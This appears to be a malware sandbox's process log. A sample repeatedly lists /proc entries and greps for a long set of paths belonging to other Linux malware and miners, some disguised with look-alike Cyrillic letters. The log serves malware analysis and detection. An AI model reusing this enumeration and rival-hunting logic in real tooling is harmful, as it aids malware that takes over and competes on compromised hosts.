/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1227
-
-
/bin/grepgrep exe2⤵PID:1231
-
-
/bin/lsls -latrh /proc/irq2⤵PID:1230
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1234
-
-
/bin/grepgrep exe2⤵PID:1238
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1237
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1241
-
-
/bin/grepgrep exe2⤵PID:1244
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1243
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1247
-
-
/bin/grepgrep exe2⤵PID:1251
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1250
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1253
-
-
/bin/grepgrep exe2⤵PID:1257
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1256
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1260
-
-
/bin/grepgrep exe2⤵PID:1263
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1262
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1266
-
-
/bin/grepgrep exe2⤵PID:1270
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1269
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1272
-
-
/bin/grepgrep exe2⤵PID:1276
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1275
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1279
-
-
/bin/grepgrep exe2⤵PID:1283
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1282
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1286
-
-
/bin/grepgrep exe2⤵PID:1289
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1288
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1292
-
-
/bin/grepgrep exe2⤵PID:1296
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1295
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1298
-
-
/bin/grepgrep exe2⤵PID:1302
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1301
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1305
-
-
/bin/grepgrep exe2⤵PID:1308
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1307
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1312
-
-
/bin/grepgrep exe2⤵PID:1315
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1314
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1317
-
-
/bin/grepgrep exe2⤵PID:1321
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1320
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1324
-
-
/bin/grepgrep exe2⤵PID:1328
-
-
/bin/lsls -latrh /proc/net2⤵PID:1327
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1331
-
-
/bin/grepgrep exe2⤵PID:1334
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1333
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1337
-
-
/bin/grepgrep exe2⤵PID:1341
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1340
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1343
-
-
/bin/grepgrep exe2⤵PID:1347
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1346
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1350
-
-
/bin/grepgrep exe2⤵PID:1353
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1352
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1355
-
-
/bin/grepgrep exe2⤵PID:1358
-
-
/bin/lsls -latrh /proc/self2⤵PID:1357
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1360
-
-
/bin/grepgrep exe2⤵PID:1363
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1362
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1365
-
-
/bin/grepgrep exe2⤵PID:1368
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1367
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1370
-
-
/bin/grepgrep exe2⤵PID:1373
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1372
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1375
-
-
/bin/grepgrep exe2⤵PID:1378
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1377
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1380
-
-
/bin/grepgrep exe2⤵PID:1383
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1382
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1385
-
-
/bin/grepgrep exe2⤵PID:1388
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1387
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1390
-
-
/bin/grepgrep exe2⤵PID:1393
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1392
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1395
-
-
/bin/grepgrep exe2⤵PID:1398
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1397
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1400
-
-
/bin/grepgrep exe2⤵PID:1403
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1402
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1405
-
-
/bin/grepgrep exe2⤵PID:1408
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1407
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1410
-
-
/bin/grepgrep exe2⤵PID:1413
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1412
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1415
-
-
/bin/grepgrep exe2⤵PID:1418
-
-
/bin/lsls -latrh /proc/version2⤵PID:1417
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1420
-
-
/bin/grepgrep exe2⤵PID:1423
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1422
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1425
-
-
/bin/grepgrep exe2⤵PID:1428
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1427
-
-
